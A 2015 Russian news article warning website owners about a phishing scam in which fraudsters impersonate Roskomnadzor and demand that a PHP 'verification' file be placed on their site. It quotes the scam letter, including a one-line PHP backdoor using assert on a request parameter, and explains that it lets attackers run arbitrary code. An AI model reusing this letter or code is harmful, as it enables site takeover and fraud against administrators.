Posted 27 августа 2015,, 06:18

Published 27 августа 2015,, 06:18

Modified 11 ноября 2022,, 16:21

Updated 11 ноября 2022,, 16:21

В России пытаются взломать миллионы сайтов!

27 августа 2015, 06:18
Аферисты придумали новую схему.

27 августа 2015

Интернет-мошенники придумали новую схему обмана. Злоумышленники в этот раз решили прикинуться сотрудниками Роскомнадзора.

Многие владельца сайтов уже получили однотипные письма с таким содержанием:

"Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.... в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2*1618/2015, Ваш сайт ... был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени ..., Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id....php, содержащий следующий текст:

< ?php
Подтверждение доменного имени www....
assert(stripslashes($_REQUESTroskomnadzor));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www...../reestr/reestr-id....php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www...., следую инструкции указанной выше, то Ваш сайт ... будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

ВНИМАНИЕ! Будьте бдительны! Ни в коем случае не выполняйте требования аферистов. Внедрив этот код в ваш сайт, злоумышленник сможет выполнить любой PHP код на вашем портале. Мошенники получат возможность в точности загрузить шеллы, разместить рекламу и так далее.

"